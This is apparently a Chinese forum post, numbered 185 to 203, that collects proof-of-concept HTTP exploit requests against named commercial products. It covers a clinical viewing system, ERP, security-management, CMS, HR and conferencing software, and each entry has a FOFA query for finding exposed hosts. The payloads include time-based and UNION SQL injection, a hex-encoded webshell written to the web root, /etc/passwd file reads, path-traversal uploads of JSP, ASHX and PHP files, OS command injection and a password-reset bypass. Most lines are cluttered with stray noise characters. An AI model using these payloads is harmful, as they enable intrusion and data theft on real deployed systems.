$ \ l2 H1 J x* ]insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
/ T$ K. |8 y. K' l# O8 c& F/ }& g! k& c
( K& L- q% w* f% k" V6 U185. 瑞友天翼应用虚拟化系统SQL注入$ `& j6 M# A' S" C% D: q
version < 7.0.5.1. W! q- ?2 g# I+ m& {/ ]4 z
FOFA:app="REALOR-天翼应用虚拟化系统"1 U1 u& C! I# y5 [8 e+ h0 {4 p
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1% N: [6 d" G/ y, n
Host: host
8 d* k% |0 J7 q7 n/ d) {( X7 P% j; Z9 \2 b% [
& v4 {9 S4 V7 B; l$ P- @
186. F-logic DataCube3 SQL注入
8 [" E# p& d% G1 nCVE-2024-31750
* J O5 b- P% l, PF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
! N9 G3 a$ [4 g9 M ]+ Z" FFOFA:title=="DataCube3"
: }5 V. a! A' H+ K6 e1 R5 Q' oPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
5 @4 I$ F/ ~) d$ b; UHost: your-ip
& u5 m- K! j7 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0, j% F/ G8 Y! i1 m& E0 R, Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
7 \) V" k; a& n+ ?) O% b. F- BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 ^1 |7 Y, F6 z
Accept-Encoding: gzip, deflate
" i: {8 Y( ?; t7 M5 wConnection: close
; ?, k1 o7 l( a" dContent-Type: application/x-www-form-urlencoded
/ n3 Q2 w9 G" d1 @, j1 o; E2 c" H7 s) N( ?& ]! X0 B
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450. I( ]9 ]+ `' b, j
+ i& g- m- X8 d. b2 ^7 v; i& H0 B; T, G5 C0 N( j+ |
187. Mura CMS processAsyncObject SQL注入0 D# p ?7 D0 u
CVE-2024-32640
) G$ R5 E7 Z4 t0 q' e' r; @FOFA:"Mura CMS"% }, W& v9 |/ W
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
/ ?. i& ]. w; e4 U! kHost: your-ip
8 K- g9 i! F0 C8 g' J MContent-Type: application/x-www-form-urlencoded! W, Y7 o$ s$ l+ ~ e, ~' J
( k: O; B! K: j- D# [- _2 I' w% {1 m, H
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
9 l1 A" J a! f. T
* ?8 `2 W/ X1 M" s. E& [0 W- l# H8 A, @- m+ Z
188. 叁体-佳会视频会议 attachment 任意文件读取: V8 g0 H8 z- X% j0 P
version <= 3.9.7
6 x5 C1 I' t1 H1 H$ QFOFA:body="/system/get_rtc_user_defined_info?site_id"1 ]6 N( O, ?* h3 ?+ O
GET /attachment?file=/etc/passwd HTTP/1.1: ]& ]* m; T4 w1 H7 j1 W2 R
Host: your-ip; g1 N f+ p2 P( O2 O, ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; q9 Z8 D7 F$ _ }0 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ ?% N2 L8 B. BAccept-Encoding: gzip, deflate
2 k" v: B( K" m0 W- E7 MAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
; [$ i8 T* O1 S1 GConnection: close
7 `! V$ K$ \! V
: k. ?4 u% U7 X( e4 Y1 t: E# E; ?* \7 X5 ~% v2 L4 F8 B9 Z6 |
189. 蓝网科技临床浏览系统 deleteStudy SQL注入, u- X: V3 \4 t% G
FOFA:app="LANWON-临床浏览系统"
( v1 p0 v9 U9 P/ YGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 ]4 J" ?/ c8 G7 v. G3 o
Host: your-ip! W$ `- x9 S$ y, I1 s3 @ e
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. A8 ?6 I! s- G- O' A* bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- D x# y* S9 BAccept-Encoding: gzip, deflate
% z3 ]# q# S) y! }3 u. {Accept-Language: zh-CN,zh;q=0.99 T2 U2 n7 `- o, d: {, ]
Connection: close, M' }4 Z8 j- ^$ x* [
% F, S/ U; |( J& B; K1 Z/ [3 R" o+ Y7 x& a+ o
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
- E& Y" _% V' e* n# YFOFA:title=="短视频矩阵营销系统"
5 s: m( Q& p, W& FPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
- L) ^! l W8 m! Y$ ^4 X- xHost: your-ip
: b! ^$ ]7 p& R! V3 r8 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36" G, d! n& d; q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. A: i$ y* c# V; ^+ i wContent-Type: application/x-www-form-urlencoded/ V6 l/ V$ U3 @5 A
Accept-Encoding: gzip, deflate; C8 Z2 [5 E$ `1 W% [9 U
Accept-Language: zh-CN,zh;q=0.9/ d# h4 H0 f8 X' d1 F+ H
/ M5 J9 o5 ]9 W0 ]9 }( t5 ?& Npoi=file:///etc/passwd" K" B2 ]% |' w0 e& I
0 K1 T1 a* D. F# A7 D2 w
" a* u/ [/ y! D/ ?+ A( I) M191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' ]: f* z- K$ v+ Y
FOFA:body="/CDGServer3/index.jsp"
) }5 N' i0 p# \9 F+ F5 rPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
" ?$ A4 d0 j# pHost: your-ip
6 U( O' ^' Z* C' [. v ^$ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: l; }, }7 D4 C1 {: w/ bContent-Type: application/x-www-form-urlencoded c9 q2 N% Z& u" f
+ Z1 K Y) J& a0 g- c# Y; O2 V" Ccommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=7 O1 k* d) m1 L1 q+ |
* G, p2 L) q( K' C. F) T
% a! t; m: a7 K2 W ?
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
; U) t- y6 V8 a9 p1 TFOFA:title="用户登录_富通天下外贸ERP"
h2 [* H7 { J" D7 ?" ZPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1+ J# e2 |: y6 w; q" m
Host: your-ip0 J/ F R* w! L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* v/ L. M: q. I5 w3 ~: @8 N
Content-Type: application/x-www-form-urlencoded/ I6 ~# ?% i: R: h. ?9 Q
" V0 _$ L- [2 c+ d. j9 m! i: @
* ^1 L4 f) [' ^7 `/ g3 p# e! A<% @ webhandler language="C#" class="AverageHandler" %>
1 }, S* a. O/ ~. Gusing System;
8 \, O( E/ B! l2 q5 g9 ^1 v- Cusing System.Web;
9 t6 u. |" z7 ]2 U5 P% gpublic class AverageHandler : IHttpHandler" j( [- C- q2 s: C6 j
{
! G4 D8 j& m J" {' [" X+ ~, epublic bool IsReusable( e7 d7 Z4 E# d0 j" ~( ]/ P
{ get { return true; } }
. ]0 N5 M8 A' K2 \3 g; W1 mpublic void ProcessRequest(HttpContext ctx)9 f$ U1 t M3 b" B/ }
{
, H0 k! a$ @; ?5 Ictx.Response.Write("test");% a& C% U. W- u, r
}
' S, _% o* V# c2 Q. b9 z% j}% w/ u3 v8 a% d8 T- t" {3 K
1 `3 V0 J: `2 {& Y G7 o" r7 C( P
; n/ R! k& {1 A7 W193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
; B, \2 t) C$ Y% u* `7 H; a% tFOFA:body="山石云鉴主机安全管理系统"- f5 r1 N, [+ T) ~
GET /master/ajaxActions/getTokenAction.php HTTP/1.1( M7 l) V3 B1 g2 A5 w. P
Host:& p- E0 d Z# M& u1 }; q
Cookie: PHPSESSID=2333333333333;+ G- c0 E! c/ V( P. Z
Content-Type: application/x-www-form-urlencoded* x6 R, m& S* Y2 Q: l0 k
User-Agent: Mozilla/5.0: ~9 Y6 M* T* A, I' O' G$ T& z
1 k# Q# c( G" }0 ]" H3 h, d
) ~( J: ~. L U8 A* rPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
t" a) c& O& [, s& L X% v6 L$ y) UHost:4 w# ~/ G, U- {4 ]
User-Agent: Mozilla/5.0
& Z& E8 C$ g" y" J) _+ YAccept-Encoding: gzip, deflate& h: @$ `" O5 q: j
Accept: */*. ]# v5 n# K0 B: s* O# d
Connection: close
. q& i, H2 v+ o* F( I" FCookie: PHPSESSID=2333333333333; ]$ L6 y* [* l1 A3 o) ]
Content-Type: application/x-www-form-urlencoded
3 [1 Z- ` T/ v, XContent-Length: 84
6 n$ O* W) _* L) X7 | \0 U% r }& p- d; L& P: ] b
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')0 z$ T6 S! m) X1 C; W
0 }3 b7 u& r8 ^ @, c4 c2 E% [0 h+ [% Q
GET /master/img/config HTTP/1.1) k, c1 p2 U& x* r/ U& f
Host:
5 \+ ]9 k6 o, `4 |9 _ B; i# {User-Agent: Mozilla/5.0
% m. q/ A/ ~# R& Q& E
7 l* H2 W$ ~+ @/ w6 c9 h% j" ^) N) o7 `
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传8 t" E8 j! C3 B' E
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在5 R5 A, G3 J" v& T8 o7 q+ N' p
0 J$ f8 u4 v. e7 w; X8 C( zPOST /servlet/uploadAttachmentServlet HTTP/1.1
$ Y6 C. e* n, r" X) l G4 oHost: host
# |% u# J* e% [; PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36- E; M4 c Y% s# l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 E7 X y' Q' `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 a1 l5 P( i" V/ M3 I9 m
Accept-Encoding: gzip, deflate
8 S1 G5 G& l" K& F1 g8 w" L7 Y) qConnection: close( `: _) G6 r/ H3 L: \3 i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 _9 h1 X" G$ @
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 P, V9 \ f4 f
3 R7 w) A- D$ Q+ w8 J6 YContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"0 h U4 K4 b7 q& ^6 n+ X4 v0 [
Content-Type: text/plain
( y, G4 m' ]. ?+ @ Z9 |; Q8 F `# F<% out.println("hello");%>
, U/ g6 R& g1 a" T; d- g$ b# `------WebKitFormBoundaryKNt0t4vBe8cX9rZk9 C$ q& y9 H( M% J8 {/ j
Content-Disposition: form-data; name="json"
2 x- t" t* L) s! m {"iq":{"query":{"UpdateType":"mail"}}}
7 l9 P' H+ }6 [) z------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
; M5 G$ o% |0 u: q* e4 F2 w
5 \( U# F4 z/ o# `4 U( \
' w8 v* E1 { b# H/ G195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
R5 X7 |, S7 k/ `FOFA:title=="飞鱼星企业级智能上网行为管理系统" w2 ~# l7 A& g# i! O6 ?
POST /send_order.cgi?parameter=operation HTTP/1.17 b8 j9 R0 @* C$ z3 m+ N
Host: 127.0.0.1
2 o* b! O' {, W2 X. GPragma: no-cache; d1 M% {3 o! W8 \' o7 ?
Cache-Control: no-cache
5 f+ @9 I7 D% L" w) B3 a* jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ \' x' o; j' `. I3 b v% \Accept: */*, y% ? ^4 W2 K) L
Accept-Encoding: gzip, deflate8 O% U @5 R$ u3 T, k! X1 W
Accept-Language: zh-CN,zh;q=0.95 b6 ~: s, d9 {
Connection: close# E& V/ }1 U& i) J2 t! [3 e% m
Content-Type: application/x-www-form-urlencoded% k, s) W% P, v) @
Content-Length: 68
: R+ \7 i9 T3 N; C
/ S" E: e- N" v+ v: s4 F$ Q, {{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}! D& ]+ Q7 n! N. X! V1 p
8 o$ N8 z3 L. A% I# v7 p
" |2 p" c: e7 G3 Y4 G" X4 ]7 w% N$ R196. 河南省风速科技统一认证平台密码重置! K* Z" B# q3 V' }& Z% U! ~6 k
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
! Z. U( E. s( L8 D1 H8 L/ K8 KPOST /cas/userCtl/resetPasswordBySuper HTTP/1.19 ~( R2 D3 f; }* O+ _( e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) w) r) m; [' T: Y+ LContent-Type: application/json;charset=UTF-8
! s @2 o% ~# v; c. R. |# k6 p0 jX-Requested-With: XMLHttpRequest3 p7 A l0 X$ @( F) n* N+ @- y
Host:
; h0 M; q! S% t/ a4 D0 CAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2; N. S0 x! `6 E+ B- b) V h
Content-Length: 45' O, L) m& [8 A$ q7 z- m& @" C* t ^$ k# V2 ]
Connection: close1 M/ L1 W0 m% Y6 z2 H
/ [! i5 e% ~- a& w/ A
{"xgh":"test","newPass":"test666","email":""}
7 P; _" b3 c5 F J4 m1 J* p& e$ j2 J* Z" s0 q
8 H' g! X2 C7 O; N
3 x0 h# u/ k, i" B" n197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
, q, @" u1 [% f8 `7 [6 uFOFA:app="浙大恩特客户资源管理系统"
; S. w2 N5 A1 r. c% y, UGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
. z- o& I& g q! VHost:# o! I: O0 Y" R- k" \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.368 u8 i+ r, K0 i; I8 v
Accept-Encoding: gzip, deflate4 Y: o( i& G1 t: y
Connection: close
0 d8 g, \; j9 K2 O* n& F1 D7 _; e9 B) P# h6 q# b
* o4 l( b' l3 s8 h5 Y9 N
+ ] _* K# I! _' ~198. 阿里云盘 WebDAV 命令注入- d8 e3 F% M3 a9 L5 i" z
CVE-2024-29640
' v3 {: m' i; @# N% G2 AGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
0 V* L7 l: {; d0 s, A4 UCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
- k, I4 }- g, B* qAccept: */*
4 {8 Z- C+ C# d* w- x5 Y9 S7 qAccept-Encoding: gzip, deflate. {" Y/ e) m; }( C4 t$ C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
) k' B- r; v, M& V4 M" DConnection: close- k! c$ a( \! E
% p3 @- s* w( X) q' \2 l
. {" \; G+ |0 f+ W6 e8 ?( s# T
199. cockpit系统assetsmanager_upload接口 文件上传
. ~4 h7 t# p" _+ \- n( r/ K' i. E
! E' b5 k6 v6 ^) ?9 V) v$ Q) e1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
: X+ w, e+ W' s1 Z0 @: ^& a1 ^! h6 T4 cGET /auth/login?to=/ HTTP/1.1- e$ B) ]! H6 V6 A: m; U
+ W7 t& @7 P- \1 M响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
6 M; X* A& F! H. U8 V$ x% F9 J6 q4 j: x" g3 C7 f& E7 q+ [# |, V
2.使用刚才上一步获取到的jwt获取cookie:
6 r) t7 g& M" Y2 `- m7 C8 g, E* Z( P
POST /auth/check HTTP/1.1; Z& K: f% e2 w$ v
Content-Type: application/json8 u' @& P) K# h- B9 M& J, r
5 y P* m: V6 b+ P" T. W
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
1 V" z' @& v4 `# N$ A1 G0 |; O9 R% a( e) j7 J T+ d
响应:200,返回值:
( G) F) g$ Y( D% c/ B9 _Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/8 N7 b6 Z) M( u E6 _
Fofa:title="Authenticate Please!"
; K, q0 h* D# s) F! wPOST /assetsmanager/upload HTTP/1.1
2 D. f: d: C, @" R$ TContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
- f0 {/ D8 ~+ d8 dCookie: mysession=95524f01e238bf51bb60d77ede3bea921 `6 \' y! F5 Z$ \
, O/ C. d7 ^; m1 p3 g+ ` Q-----------------------------36D28FBc36bd6feE7Fb3
* O9 u8 f5 e! Q% ^. c. R+ uContent-Disposition: form-data; name="files[]"; filename="tttt.php") |4 B# P/ I! G& B, |
Content-Type: text/php
' g& W- _3 k/ _$ ^( ^" F S0 W* r; a! `6 P8 d- Q8 E
<?php echo "tttt";unlink(__FILE__);?>2 D" q- R$ v# ]1 E* Z% A
-----------------------------36D28FBc36bd6feE7Fb34 s8 d; k* Z) G
Content-Disposition: form-data; name="folder"4 a: {( E: Y2 d& V5 a5 h+ o
( g# I6 Y. F7 n- V p-----------------------------36D28FBc36bd6feE7Fb3--
6 Y* B H4 i- o# F4 i+ P$ y W
" F/ D" Z+ O6 A/ `" I* L5 k& `8 c" y! v) m9 M. O6 J$ X9 R1 ~& X
/storage/uploads/tttt.php
5 J! _" _7 W# L2 N# E2 s+ T3 H: z, J' u+ U& h0 B
200. SeaCMS海洋影视管理系统dmku SQL注入
& _' i% w* c0 m, z" OFOFA:app="海洋CMS"
1 y# v* G* t; {, C: ]! zGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1; Q% j% x6 ?0 O" m$ R
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
1 @% Y# c0 M' y6 C J) SUpgrade-Insecure-Requests: 1$ g0 T: \( |: |6 C' v2 w5 f; q
Cache-Control: max-age=0) x+ w2 f4 k$ @2 F) U+ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& R4 J# w6 R8 G' k r1 z
Accept-Encoding: gzip, deflate
; v. d8 N8 U! D0 Y& v* A) T3 v1 y. jAccept-Language: zh-CN,zh;q=0.9. l0 j7 V. j6 `: V4 W
" _- p, b% J; j: [
6 F4 O" ^1 T2 k& I+ j201. 方正全媒体新闻采编系统 binary SQL注入
7 z6 [- X. y3 d. X7 B* I! RFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"/ ]9 L; {2 @3 z; W& w4 D' q
POST /newsedit/newsplan/task/binary.do HTTP/1.1
! b3 K% X& T" o7 c# e* b# RContent-Type: application/x-www-form-urlencoded
' ]" K- N9 ^; m. F7 N5 R/ W8 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ h0 D% Q- O: y* n$ S
Accept-Encoding: gzip, deflate H( l V0 p* z$ h- o! Y7 h$ k
Accept-Language: zh-CN,zh;q=0.9; h5 Q4 A p% s. D$ {, j! }: _
Connection: close
+ G. a7 Z* Z3 ]6 z! R9 e9 r6 _2 K" s8 H! x( d j4 Q. F" H0 \0 F
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
" x! d, g1 `% l2 t2 Z: @( i
' }. P' ^+ b+ `) i c1 b/ i8 M4 B7 U
202. 微擎系统 AccountEdit任意文件上传1 H8 }7 O2 b3 A b w8 o O. [. i" T
FOFA:body="/Widgets/WidgetCollection/"
$ ~+ p, E W; v获取__VIEWSTATE和__EVENTVALIDATION值$ t$ U+ m6 x k7 E& s
GET /User/AccountEdit.aspx HTTP/1.1
: ^' d! D- I6 E2 KHost: 滑板人之家 J/ t; d& g8 K z7 ~( q& N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
! Y& ^+ ?% t% nContent-Length: 0. z8 C" n ` E9 V
8 C7 S' m- B. V- p N' h) E1 W9 o8 O' G
替换__VIEWSTATE和__EVENTVALIDATION值
# _4 H: K' L# Y" Y% ePOST /User/AccountEdit.aspx HTTP/1.1
; D+ z ^, Y9 ^Accept-Encoding: gzip, deflate, br9 t; @! e4 T0 s B$ w' o
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687* N6 P- F. ~8 F6 v. v6 _1 \# a
# F9 O7 w) G3 S0 w) \& x
-----------------------------786435874t38587593865736587346567358735687
( e9 a0 D6 [2 V0 y- BContent-Disposition: form-data; name="__VIEWSTATE"
4 x+ u; v' w8 X- _$ D; x3 D n
__VIEWSTATE$ W. k3 x, R# i0 \* s s
-----------------------------786435874t38587593865736587346567358735687; t T6 q5 Z7 ?0 {$ @& P
Content-Disposition: form-data; name="__EVENTVALIDATION"$ J, M" {& j! V% @
& N4 N; W6 b( P% _: O9 }% y; e__EVENTVALIDATION
7 M8 a. J! W* o% @- l* b& m( [9 [-----------------------------786435874t38587593865736587346567358735687
; ?# C+ }* c: J" }: D$ lContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"! U+ a! q% q4 W' R) W8 Y
Content-Type: text/plain# z( {' c# k% P: w7 L
" W) r/ Z- V* f& ~. \8 e
Hello World!
! S( K* U0 u1 r- b' z-----------------------------786435874t38587593865736587346567358735687
# e/ h7 r N/ I' i/ Y" ^0 bContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
5 ~, e& G9 G0 P6 Z5 z6 ^+ b0 j' a* V. X; j5 Y
上传图片
4 s! h1 F( G: _, d8 z# F; A* `' P-----------------------------786435874t38587593865736587346567358735687$ b n! m+ @! O* K+ m
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"6 ]! D. [1 A) C0 @, E6 [2 \
% O& b5 W/ C5 {& e, ]0 I3 V+ e4 S" t9 d; F5 B$ H
-----------------------------786435874t38587593865736587346567358735687
9 i5 v- c" t) c1 @Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
$ s2 j, @1 Y3 g+ j
' F; N& y, q: @: b% [8 w/ \! l5 l1 s
-----------------------------786435874t38587593865736587346567358735687--
# P( c& K4 a9 i8 Q5 K
7 U1 N y8 v# c- V. T2 C* t, `. i; w7 H
/_data/Uploads/1123.txt
$ ^/ @# n' v8 t6 y/ z# U4 U& k
6 B/ S- y2 W2 K0 G! x: h0 m203. 红海云EHR PtFjk 文件上传
! I# Y0 q9 E$ k) `) |FOFA:body="RedseaPlatform"
8 ?& o, e* n: H4 p2 h! DPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1; c. p. Q$ p# f
Host: x.x.x.x
, K: C* X5 |! M* i& ~Accept-Encoding: gzip
: i! ?! c! U1 R8 J/ [, w4 l# dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; X: M8 W' D4 u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
) B! W1 x! R0 D9 X+ a+ y, rContent-Length: 210
0 V2 p( B% y2 D" I/ {' W- b2 w" w
------WebKitFormBoundaryt7WbDl1tXogoZys4; Q) o9 O) V5 d6 O) X6 D
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"% z! Z, Z3 Z* u5 v- x S7 u' |
Content-Type:image/jpeg
+ u7 |- b0 A% y/ t; ]% q& s* V; _8 N* T0 [
<% out.print("hello,eHR");%>: v/ F- E3 s$ ^9 m2 @) u3 k% O
------WebKitFormBoundaryt7WbDl1tXogoZys4--3 v& W9 k) N9 T& h4 o# y% c: V; L
* T& b; K0 _6 j& J2 k G
$ k0 j- C$ |: ~7 N- _( v5 V/ V7 c7 k1 V2 O* m
* |$ ~# A0 }- X) A0 y: c
% f6 C: N8 Y- _* M
* M; I& E- |$ W |
发表于 2024-6-5 14:31:29
收藏
支持
反对